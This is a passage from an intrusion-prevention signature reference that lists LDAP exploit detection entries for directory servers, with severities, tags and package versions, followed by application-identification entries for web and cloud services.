Vulnerability: OpenLDAP-Slapd-Search-Parsing-Issuerandthisupdatecheck-Integer-Underflow
Description:
Back to top

LDAP_CS-OpenLDAP-Slapd-serialNumberAndIssuerCheck-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in OpenLDAP slapd detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2020, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: OpenLDAP-Slapd-serialNumberAndIssuerCheck-Integer-Underflow
Description:
Back to top

LDAP_CS-Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Red Hat 389 Directory Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat 389 Directory Server, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service
Description:
Back to top

LDAP_CS-Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service-2

About this situation: An attempt to exploit a vulnerability in Red Hat 389 Directory Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat 389 Directory Server, CVE2018, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1655-5242
Vulnerability: Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service
Description:
Back to top

LDAP_CS-Red-Hat-389-Directory-Server-NS-Slapd-ldapsearch-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Red Hat 389 Directory Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat 389 Directory Server, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1131-5242
Last changed: sgpkg-ips-1131-5242
Vulnerability: Red-Hat-389-Directory-Server-NS-Slapd-ldapsearch-Buffer-Overflow
Description:
Back to top

LDAP_CS-Red-Hat-389-Directory-Server-Server-Side-Sort-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Red Hat 389 Directory Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat 389 Directory Server, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1107-5242
Vulnerability: Red-Hat-389-Directory-Server-Server-Side-Sort-Denial-Of-Service
Description:
Back to top

LDAP_CS-Red-Hat-389-Directory-Server-Vslapd_Log_Emergency_Error-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Red Hat 389 Directory Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat 389 Directory Server, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Vulnerability: Red-Hat-389-Directory-Server-Vslapd_Log_Emergency_Error-Denial-Of-Service
Description:
Back to top

LDAP_CS-Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: LDAP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Samba, CVE2020, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: OpenLDAP-Nested-Filter-Stack-Overflow
Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
Description:
Back to top

LDAP_CS-Samba-LDAP-Ad-Dc-Paged-Search-DoS

About this situation: An attempt to exploit a vulnerability in Samba detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1190-5242
Vulnerability: Samba-LDAP-Ad-Dc-Paged-Search-DoS
Description:
Back to top

LDAP_CS-Samba-LDAP-Ad-Dc-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Vulnerability: Samba-LDAP-Ad-Dc-Privilege-Escalation
Description:
Back to top

LDAP_CS-Samba-LDAP-Server-Libldb-Infinite-Loop-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1584-5242
Vulnerability: Samba-LDAP-Server-Libldb-Infinite-Loop-Denial-Of-Service
Description:
Back to top

LDAP_CS-Samba-Ndr-Parsing-Ndr_Pull_Dnsp_Name-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-842-5242
Vulnerability: Samba-Ndr-Parsing-Ndr_Pull_Dnsp_Name-Integer-Overflow
Description:
Back to top

LDAP_CS-Suspicious-Packet

About this situation: A suspicious traffic pattern detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

LDAP_CS-VMware-Vcenter-Server-Directory-Service-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in VMware vCenter Server detected
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMware vCenter Server, CVE2020, Any Operating System not specific, Suspected Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1268-5242
Vulnerability: VMware-Vcenter-Server-Directory-Service-Authentication-Bypass
Description:
Back to top

LDAP_CS-VMware-Vcenter-Server-Directory-Service-Authentication-Bypass-2

About this situation: An attempt to exploit a vulnerability in VMware vCenter Server detected
Context: LDAP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, VMware vCenter Server, CVE2020, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Vulnerability: VMware-Vcenter-Server-Directory-Service-Authentication-Bypass
Description:
Back to top

LDAP_CS-Windows-Active-Directory-Buffer-Overflow

About this situation: Detects attempts to exploit a heap overflow vulnerabity in Windows Active Directory
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2007-07, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1841-5242
Vulnerability: Microsoft-Windows-Active-Directory-Buffer-Overflow
Description:
Back to top

LDAP_CS-Windows-Active-Directory-Parsing-Memory-Corruption

About this situation: Detects attempts to exploit a memory corruption vulnerabity in Windows Active Directory
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-06, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Windows-Active-Directory-LDAP-Parsing-Memory-Corruption
Description:
Back to top

LDAP_IBM-Lotus-Domino-LDAP-Server-Invalid-DN-Message-Buffer-Overflow

About this situation: Buffer overflow exploit against IBM Lotus Domino LDAP service detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows 2003, Windows 2003 64-bit, Windows 2000 Server, Windows 2000 Advanced Server, x86, Lotus Domino, CVE2007, Windows 2003 not specific, Lotus Domino not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: LDAP-IBM-Lotus-Domino-LDAP-Server-Invalid-DN-Message-Buffer-Overflow
Description:
Back to top

LDAP_IBM-Tivoli-Directory-Server-LDAP-Buffer-Overflow

About this situation: Detects Buffer Overflow Exploits Against IBM Tivoli Directory Server
Context: LDAP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, IBM Tivoli Directory Server, CVE2006, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1276-5242
Vulnerability: LDAP-IBM-Tivoli-Directory-Server-LDAP-Buffer-Overflow
Description:
Back to top

LDAP_Ipswitch-IMail-LDAP-Daemon-DoS

About this situation: Ipswitch IMail LDAP daemon DoS
Context: LDAP Client Stream
Severity: 2
Tags: Windows, Any Hardware, IMail, CVE2004, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
Description:
Back to top

LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF

About this situation: Attempt to exploit buffer overflow in Ipswitch IMail LDAP daemon
Context: LDAP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IMail, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
Description:
Back to top

LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF-2

About this situation: Attempt to exploit buffer overflow in Ipswitch IMail LDAP daemon
Context: LDAP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IMail, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
Description:
Back to top

LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF-3

About this situation: Attempt to exploit buffer overflow in Ipswitch IMail LDAP daemon
Context: LDAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IMail, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
Description:
Back to top

LDAP_Ipswitch-IMail-LDAP-Daemon-Probe

About this situation: Potential probe for buffer overflow in Ipswitch IMail LDAP daemon
Context: LDAP Client Stream
Severity: 2
Tags: Windows, Any Hardware, IMail, CVE2004, Windows not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
Description:
Back to top

LDAP_Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Microsoft Active Directory on Windows 2000 Server platform detected
Context: LDAP Client Stream
Severity: 7
Tags: Windows 2000, Any Hardware, MS2008-10, CVE2008, Windows 2000 not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-348-4219
Vulnerability: LDAP-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow
Description:
Back to top

LDAP_Novell-eDirectory-evtFilteredMonitorEventsRequest-Function-Heap-Overflow

About this situation: Detects buffer overflow exploits against Novell eDirectory
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: LDAP-Novell-eDirectory-evtFilteredMonitorEventsRequest-Function-Heap-Overflow
Description:
Back to top

LDAP_Novell-eDirectory-evtFilteredMonitorEventsRequest-Invalid-Free

About this situation: Detects buffer overflow exploits against Novell eDirectory invalid free vulnerability
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-436-4219
Vulnerability: LDAP-Novell-eDirectory-evtFilteredMonitorEventsRequest-Invalid-Free
Description:
Back to top

LDAP_OpenLDAP-ber-get-next-BER-Decoding-Denial-Of-Service

About this situation: Attempt to exploit a denial of service vulnerability in OpenLDAP slapd detected
Context: LDAP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2008, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: LDAP-OpenLDAP-ber-get-next-BER-Decoding-Denial-Of-Service
Description:
Back to top

LDAP_OpenLDAP-LDAP-Server-BIND-Request-Denial-Of-Service

About this situation: Detects denial of service exploits against OpenLDAP
Context: LDAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenLDAP, CVE2006, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-277-4219
Vulnerability: LDAP-OpenLDAP-LDAP-Server-BIND-Request-Denial-Of-Service
Description:
Back to top

LDAP_Oracle-Internet-Directory-Pre-Authentication-LDAP-Denial-Of-Service

About this situation: Detects denial of service exploits against the Oracle Internet Directory
Context: LDAP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Application Server, Oracle Identity Manager, CVE2008, Any Operating System not specific, Oracle Application Server not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-180-2032
Vulnerability: LDAP-Oracle-Internet-Directory-Pre-Authentication-LDAP-Denial-Of-Service
Description:
Back to top

LDAP_SS-JNDI-Exploit-Kit-Traffic

About this situation: JNDI Exploit Kit traffic detected
Context: LDAP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1417-5242
Last changed: sgpkg-ips-1417-5242
Vulnerability: JNDI-Exploit-Kit-Traffic
Description:
Back to top

LDAP_SS-Microsoft-Windows-LDAP-Searchresultdone-Integer-Overflow-CVE-2024-49112

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: LDAP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-12, CVE2024, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Microsoft-Windows-LDAP-Searchresultdone-Integer-Overflow-CVE-2024-49112
Description:
Back to top

LDAP_SS-Php-LDAP-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: LDAP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Php-LDAP-Denial-Of-Service
Description:
Back to top

LDAP_SS-Serialized-Java-Content

About this situation: Serialized Java content detected
Context: LDAP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1417-5242
Last changed: sgpkg-ips-1417-5242
Description:
Back to top

LDAP_SS-Shared-Variables-For-Server-Stream-Context

About this situation: This fingerprint sets shared variables
Context: LDAP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1845-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

LDAP_SS-Suspicious-Packet

About this situation: A suspicious traffic pattern detected
Context: LDAP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-582-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

LDAP_Sun-Directory-Server-LDAP-DOS

About this situation: Detects denial of service exploits against the Sun Directory Server
Context: LDAP Client Stream
Severity: 2
Tags: Solaris 9, Any Hardware, Sun Microsystems JavaSystem Directory Server, CVE2006, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-200-2032
Vulnerability: LDAP-Sun-Directory-Server-LDAP-DOS
Description:
Back to top

Le-Monde

About this situation: LeMonde.fr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Description: Le Monde is a French daily newspaper.
Back to top

Lead-Zeppelin

About this situation: Application Lead-Zeppelin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lead Zeppelin is an easy-to-use web CRM that keeps your contacts
Back to top

Lead411

About this situation: Application Lead411 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lead411 provides information about companies, executives and how to get a hold of them. Database has over 5,000,000 people and over 1M companies.
Back to top

LeadConduit

About this situation: Application LeadConduit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeadConduit is a real-time platform that handles the capture, validation, tracking, and delivery of Internet leads.
Back to top

Leaddesk

About this situation: LeadDesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software supports the sales, research, and customer service of an organization happening over the phone. It combines a CRM, Campaign Management, and customer database with calling. Source: Wikipedia
Back to top

LeaderNation-360

About this situation: Application LeaderNation-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeaderNation is a cost-effective, web-based leadership development solution. Suite of tools enables consultants, coaches, and HR professionals to quickly create customized leadership competency models and 360 feedback surveys.
Back to top

LeadExec

About this situation: Application LeadExec detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeadExec was designed for marketing and sales professionals that rely on the real-time distribution and management of leads.
Back to top

LeadLander

About this situation: Application LeadLander detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeadLander is a web-based application that gives your sales staff access to real-time customer intelligence analytics reports.
Back to top

Leadmaster

About this situation: LeadMaster usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

LeadNXT

About this situation: Application LeadNXT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeadNXT is a cloud based solution to boost and automate the entire Sales and Marketing for generating and tracking Business Leads.
Back to top

LeadPages

About this situation: Application LeadPages detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeadPages is software that enables to create mobile responsive landing pages, launch pages, sales pages and other conversion pages.
Back to top

LEADSExplorer

About this situation: Application LEADSExplorer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LEADSExplorer identifies the company names of the visitors on your website, their interest in your products and the level of interest (scoring).
Back to top

leadsNyou

About this situation: Application leadsNyou detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeadsNyou is a marketing service that provides several tool such as Email Marketing and SMS Marketing, along with a database.
Back to top

LeadWatchLive

About this situation: Application LeadWatchLive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeadWatchLive digital marketing and student prospecting software.
Back to top

Leafcutter

About this situation: Application Leafcutter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Leafcutter is cloud management that provides big agency advantages for everyone in your business.
Back to top

Leagueoflegends

About this situation: LEAGUEofLEGENDS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This application is an online, real-time strategy game.
Back to top

Lean-Canvas

About this situation: Application Lean-Canvas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lean Canvas helps to create a business model that will be read by more people, be more easily updated, and let you focus on building your business - faster.
Back to top

LeanKit

About this situation: Application LeanKit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeanKit is a visual project and process management tool that allows organizations to easily visualize and manage the flow of their work, while collaborating with team members to consistently deliver results.
Back to top

LeanLogistics

About this situation: Application LeanLogistics detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeanTMS reduces transportation costs, improves transportation service, KPIs with
Back to top

LeapFILE

About this situation: Application LeapFILE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeapFILE mission to enhance business communications and productivity with secure file delivery and file exchange, in order make exchanging business-critical files simple and secure for end users, while making management robust and compliant for administrators.
Back to top

Learndot

About this situation: Application Learndot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Learndot offers a suite of training, testing, and certification tools that enable organizations to run fully hosted universities, academies, and knowledge centers.
Back to top

LearningZen

About this situation: Application LearningZen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LearningZen is online training and assessment platform.
Back to top

LearnSmart-LMS

About this situation: Application LearnSmart-LMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LearnSmart - corporate e-learning and training LMS solutions.
Back to top

LearnUpon

About this situation: Application LearnUpon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LearnUpon is cloud based learning platform designed specifically to meet the needs of training companies, content developers and small to medium sized companies.
Back to top

Leave-Planner

About this situation: Application Leave-Planner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LeavePlanner absence management software manages all types of leave - LeavePlanner annual leave holiday planner, manage absence, online HR software solution.
Back to top

Leavetrack

About this situation: Application Leavetrack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Leavetrack - absence management software. Leavetrack offers to manage, approve and track your employees' holiday, sick leave and other absences.
Back to top

Lefora

About this situation: Lefora usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: A web forum site
Back to top

Leftronic

About this situation: Application Leftronic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Leftronic is a cloud infrastructure that can in real-time data visualization and status monitoring platform for businesses.
Back to top

Legal-Intelligence

About this situation: Application Legal-Intelligence detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Legal Intelligence is the first and largest legal services for content integration in the Netherlands. The system search attorneys and lawyers all Dutch and European legal sources at once, over the internet. Legal Intelligence also provides search services for specific tax (Tax Intelligence) and the government (Public Intelligence).
Back to top

LegalDiscovery

About this situation: Application LegalDiscovery detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LegalDiscovery is the company that provides eDiscovery technology in the market. It provides services to assist clients in developing, implementing, delivering and managing their entire eDiscovery life cycle.
Back to top

Legalesign

About this situation: Application Legalesign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Legalesign is high performance business software for electronic signature. An industry leader in support, Legalesign is robust and secure online esignature software.
Back to top

Legalzoom.com

About this situation: LegalZoom.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: LegalZoom provides legal solutions in various common categories including copyrights, DBAs, divorce, business formation, trusts, wills, name changes, patents, power of attorney, pre-nuptial agreements, real estate leases, trademark registration. The company also provides a directory of attorneys as a certified California attorney referral service and offers flat fee legal plans with member-reviewed attorneys.
Back to top

Leiki

About this situation: Leiki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-628-5211
Description: Leiki is an online statistics and analytics service.
Back to top

LemonStand-eCommerce

About this situation: Application LemonStand-eCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LemonStand eCommerce is a eCommerce platform for web agencies and retailers.
Back to top

Lemontech-Selfbooking

About this situation: Application Lemontech-Selfbooking detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lemontech Selfbooking is a company that specialized in developing software that contribute to the corporate travel management in company.
Back to top

LendingClub

About this situation: Application LendingClub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lending Club is the online credit marketplace, facilitating personal loans, business loans, and financing for elective medical procedures and K-12 education and tutoring.
Back to top

Lengow

About this situation: Application Lengow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
